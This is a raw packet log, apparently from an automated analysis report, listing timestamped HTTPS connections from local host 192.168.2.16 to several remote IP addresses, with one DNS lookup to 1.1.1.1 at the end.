                                                                                                                                                                                                                                            Dec 23, 2024 10:35:40.091407061 CET49705443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:40.091530085 CET49705443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:40.091552973 CET44349705172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:40.287796974 CET49706443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:40.287899971 CET44349706172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:40.288012981 CET49706443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:40.288389921 CET49706443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:40.288424969 CET44349706172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:41.501075029 CET44349706172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:41.501173973 CET49706443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:41.502453089 CET49706443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:41.502482891 CET44349706172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:41.503231049 CET44349706172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:41.506339073 CET49706443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:41.506411076 CET49706443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:41.506453991 CET44349706172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:42.313669920 CET44349706172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:42.313771963 CET44349706172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:42.314507008 CET49706443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:42.314589024 CET49706443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:42.314613104 CET44349706172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:43.331434011 CET49707443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:43.331491947 CET44349707172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:43.331577063 CET49707443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:43.331875086 CET49707443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:43.331886053 CET44349707172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:44.561048985 CET44349707172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:44.561218977 CET49707443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:44.562282085 CET49707443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:44.562303066 CET44349707172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:44.562879086 CET44349707172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:44.564235926 CET49707443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:44.564235926 CET49707443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:44.564285040 CET44349707172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:44.564503908 CET49707443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:44.564549923 CET44349707172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:44.564713001 CET49707443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:44.564728975 CET44349707172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:46.213826895 CET44349707172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:46.213926077 CET44349707172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:46.214004993 CET49707443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:46.214102030 CET49707443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:46.214127064 CET44349707172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:46.217068911 CET49708443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:46.217118025 CET44349708172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:46.217199087 CET49708443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:46.217489004 CET49708443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:46.217502117 CET44349708172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:47.430067062 CET44349708172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:47.430212021 CET49708443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:47.431349993 CET49708443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:47.431365967 CET44349708172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:47.431593895 CET44349708172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:47.433170080 CET49708443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:47.433192968 CET49708443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:47.433239937 CET44349708172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:48.489021063 CET44349708172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:48.489119053 CET44349708172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:48.489181995 CET49708443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:48.489415884 CET49708443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:48.489437103 CET44349708172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:48.489449024 CET49708443192.168.2.16172.67.129.49
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:48.489454031 CET44349708172.67.129.49192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:48.796776056 CET49709443192.168.2.16172.67.182.135
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:48.796825886 CET44349709172.67.182.135192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:48.796926975 CET49709443192.168.2.16172.67.182.135
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:48.797257900 CET49709443192.168.2.16172.67.182.135
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:48.797274113 CET44349709172.67.182.135192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:50.025331020 CET44349709172.67.182.135192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:50.025435925 CET49709443192.168.2.16172.67.182.135
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:50.027009964 CET49709443192.168.2.16172.67.182.135
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:50.027023077 CET44349709172.67.182.135192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:50.027282953 CET44349709172.67.182.135192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:50.030256033 CET49709443192.168.2.16172.67.182.135
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:50.075328112 CET44349709172.67.182.135192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:50.623202085 CET44349709172.67.182.135192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:50.623246908 CET44349709172.67.182.135192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:50.623272896 CET44349709172.67.182.135192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:50.623298883 CET44349709172.67.182.135192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:50.623327971 CET44349709172.67.182.135192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:50.623336077 CET49709443192.168.2.16172.67.182.135
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:50.623358011 CET44349709172.67.182.135192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:50.623369932 CET49709443192.168.2.16172.67.182.135
Timestamp                            Src Port  Dst Port  Source IP        Dest IP
Dec 23, 2024 10:35:50.623409986 CET  49709     443       192.168.2.16     172.67.182.135
Dec 23, 2024 10:35:50.625375986 CET  443       49709     172.67.182.135   192.168.2.16
Dec 23, 2024 10:35:50.631480932 CET  443       49709     172.67.182.135   192.168.2.16
Dec 23, 2024 10:35:50.631531000 CET  49709     443       192.168.2.16     172.67.182.135
Dec 23, 2024 10:35:50.631540060 CET  443       49709     172.67.182.135   192.168.2.16
Dec 23, 2024 10:35:50.631587029 CET  49709     443       192.168.2.16     172.67.182.135
Dec 23, 2024 10:35:50.631761074 CET  49709     443       192.168.2.16     172.67.182.135
Dec 23, 2024 10:35:50.631776094 CET  443       49709     172.67.182.135   192.168.2.16
Dec 23, 2024 10:35:50.631787062 CET  49709     443       192.168.2.16     172.67.182.135
Dec 23, 2024 10:35:50.631792068 CET  443       49709     172.67.182.135   192.168.2.16
Dec 23, 2024 10:35:51.285381079 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:51.285418987 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:51.285522938 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:51.285803080 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:51.285815001 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:52.432703018 CET  49711     443       192.168.2.16     104.21.35.89
Dec 23, 2024 10:35:52.432744980 CET  443       49711     104.21.35.89     192.168.2.16
Dec 23, 2024 10:35:52.432830095 CET  49711     443       192.168.2.16     104.21.35.89
Dec 23, 2024 10:35:52.439783096 CET  49711     443       192.168.2.16     104.21.35.89
Dec 23, 2024 10:35:52.439800978 CET  443       49711     104.21.35.89     192.168.2.16
Dec 23, 2024 10:35:52.533546925 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:52.533660889 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:52.535235882 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:52.535243034 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:52.535490036 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:52.536669970 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:52.583337069 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.105705976 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.105761051 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.105804920 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.105870008 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.105886936 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.105946064 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.105946064 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.222234964 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.222259045 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.222364902 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.222382069 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.222459078 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.259846926 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.259896040 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.259969950 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.259979963 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.259994984 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.262619019 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.389719009 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.389744043 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.390013933 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.390041113 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.390182972 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.416857958 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.416924953 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.417018890 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.417026997 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.417073011 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.417073011 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.440917015 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.440973043 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.441067934 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.441067934 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.441076040 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.442573071 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.554169893 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.554229021 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.554363012 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.554363012 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.554373026 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.554671049 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.580756903 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.580807924 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.580924988 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.580924988 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.580931902 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.582573891 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.607188940 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.607239008 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.607295036 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.607304096 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.607331991 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.607386112 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.622960091 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.623012066 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.623090982 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.623090982 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.623097897 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.623177052 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.634977102 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.635029078 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.635063887 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.635068893 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.635108948 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.635108948 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.646081924 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.646132946 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.646184921 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.646214008 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.646262884 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.646262884 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.656184912 CET  443       49711     104.21.35.89     192.168.2.16
Dec 23, 2024 10:35:53.656289101 CET  49711     443       192.168.2.16     104.21.35.89
Dec 23, 2024 10:35:53.657882929 CET  49711     443       192.168.2.16     104.21.35.89
Dec 23, 2024 10:35:53.657893896 CET  443       49711     104.21.35.89     192.168.2.16
Dec 23, 2024 10:35:53.658123016 CET  443       49711     104.21.35.89     192.168.2.16
Dec 23, 2024 10:35:53.664797068 CET  49711     443       192.168.2.16     104.21.35.89
Dec 23, 2024 10:35:53.707329035 CET  443       49711     104.21.35.89     192.168.2.16
Dec 23, 2024 10:35:53.747131109 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.747183084 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.747243881 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.747255087 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.747293949 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.747293949 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.763498068 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.763549089 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.763648987 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.763648987 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.763659954 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.763746977 CET  49710     443       192.168.2.16     45.66.248.134
Dec 23, 2024 10:35:53.775299072 CET  443       49710     45.66.248.134    192.168.2.16
Dec 23, 2024 10:35:53.775362015 CET  443       49710     45.66.248.134    192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.775424004 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.775432110 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.775477886 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.775477886 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.785690069 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.785733938 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.785799980 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.785806894 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.785854101 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.785919905 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.797631979 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.797683954 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.797764063 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.797764063 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.797776937 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.797841072 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.808352947 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.808401108 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.808458090 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.808476925 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.808486938 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.808574915 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.819483995 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.819528103 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.819591999 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.819597960 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.819649935 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.819649935 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.830733061 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.830774069 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.830934048 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.830934048 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.830940962 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.831029892 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.948390961 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.948441982 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.948481083 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.948498011 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.948535919 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.948554993 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.955966949 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.956008911 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.956033945 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.956041098 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.956070900 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.956084967 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.964206934 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.964247942 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.964271069 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.964277029 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.964313030 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.964334011 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.972412109 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.972426891 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.972486973 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.972493887 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.972534895 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.979681015 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.979727983 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.979764938 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.979770899 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.979799032 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.979814053 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.988452911 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.988496065 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.988518953 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.988524914 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.988553047 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.988567114 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.995629072 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.995673895 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.995707989 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.995713949 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.995738983 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:53.995754957 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.003963947 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.004010916 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.004046917 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.004055977 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.004081964 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.004100084 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.140177011 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.140242100 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.140254021 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.140263081 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.140312910 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.146804094 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.146847010 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.146878958 CET49710443192.168.2.1645.66.248.134
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.146883965 CET4434971045.66.248.134192.168.2.16
                                                                                                                                                                                                                                            Dec 23, 2024 10:35:54.146929026 CET49710443192.168.2.1645.66.248.134
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 10:35:10.042277098 CET | 63746 | 53 | 192.168.2.16 | 1.1.1.1
Dec 23, 2024 10:35:10.277992010 CET | 53 | 63746 | 1.1.1.1 | 192.168.2.16
